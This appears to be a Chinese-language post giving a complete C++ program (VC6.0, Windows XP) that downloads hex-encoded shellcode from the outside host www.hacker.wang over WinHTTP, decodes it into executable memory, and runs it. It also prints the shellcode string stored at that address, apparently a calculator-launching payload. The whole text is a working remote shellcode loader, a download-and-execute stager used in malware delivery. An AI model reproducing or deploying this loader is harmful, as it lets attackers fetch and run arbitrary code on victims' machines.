测试环境 :windowxp
vc6.0
bihuo.cpp 代码如下:
- #include <string>
- #include <iostream>
- #include <windows.h>
- #include <winhttp.h>
- #include <stdlib.h>
- #include <string.h>
- #pragma comment(lib,"winhttp.lib")
- #pragma comment(lib,"user32.lib")
- void main()
- {
- DWORD dwSize = 0;
- DWORD dwDownloaded = 0;
- LPSTR pszOutBuffer = NULL;
- HINTERNET hSession = NULL,
- hConnect = NULL,
- hRequest = NULL;
- BOOL bResults = FALSE;
- hSession=WinHttpOpen(L"User Agent",WINHTTP_ACCESS_TYPE_DEFAULT_PROXY,WINHTTP_NO_PROXY_NAME,WINHTTP_NO_PROXY_BYPASS,0);
- if(hSession)
- {
- hConnect=WinHttpConnect(hSession,L"www.hacker.wang",INTERNET_DEFAULT_HTTP_PORT,0);
- }
- if(hConnect)
- {
- hRequest=WinHttpOpenRequest(hConnect, L"GET",L"/vc/calc.txt",L"HTTP/1.1", WINHTTP_NO_REFERER,WINHTTP_DEFAULT_ACCEPT_TYPES,0);
- }
- if(hRequest)
- {
- bResults=WinHttpSendRequest(hRequest,WINHTTP_NO_ADDITIONAL_HEADERS, 0,WINHTTP_NO_REQUEST_DATA, 0, 0, 0 );
- }
- if(bResults)
- {
- bResults=WinHttpReceiveResponse(hRequest,NULL);
- }
- if(bResults)
- {
- do
- {
- // Check for available data.
- dwSize = 0;
- if (!WinHttpQueryDataAvailable( hRequest, &dwSize))
- {
- printf( "Error %u in WinHttpQueryDataAvailable.\n",GetLastError());
- break;
- }
- if (!dwSize)
- break;
- pszOutBuffer = new char[dwSize+1];
- if (!pszOutBuffer)
- {
- printf("Out of memory\n");
- break;
- }
- ZeroMemory(pszOutBuffer, dwSize+1);
- if (!WinHttpReadData( hRequest, (LPVOID)pszOutBuffer, dwSize, &dwDownloaded))
- {
- printf( "Error %u in WinHttpReadData.\n", GetLastError());
- }
- else
- {
- printf("%s", pszOutBuffer);
- }
- //编写shellcode 开始
- const char* ShellCode = pszOutBuffer;
- int shellcode_length = strlen(ShellCode);
- unsigned char* value = (unsigned char*)calloc(shellcode_length/2,sizeof(unsigned char));
- for (size_t count=0;count < shellcode_length /2;count++)
- {
- sscanf(ShellCode,"%2hhx",&value[count]);
- ShellCode += 2;
- }
-
- void *exec = VirtualAlloc(0,shellcode_length,MEM_COMMIT,PAGE_EXECUTE_READWRITE);
- memcpy(exec,value,shellcode_length);
- printf("%s", exec);
- ((void(*)())exec)();
- // 编写shellcode 结束
- delete [] pszOutBuffer;
- if (!dwDownloaded)
- break;
- } while (dwSize > 0);
- }
- if (hRequest) WinHttpCloseHandle(hRequest);
- if (hConnect) WinHttpCloseHandle(hConnect);
- if (hSession) WinHttpCloseHandle(hSession);
- system("pause");
- }
复制代码 远程shellcode 代码如下 calc.txt中内容如下
- b8820a8d38d9c6d97424f45a29c9b12331421283eafc03c0046fcd38f02b2ec0013f6bfc8a4371848d54f23b96215ae3a7de2c6893abae80ed6b29f08aac3e0f52e6b20e961c382b42c7c53e8f8c99e44e78436f5c35073041c8fc45654103b21f092040e383e82c68a3d829ae5c15ba6f91aecc73043b4484bd351f14f1461f15792e234a4c593b22275d380a4cce56f56b0cd561142f937c732f44e31aa3e9e4
复制代码
|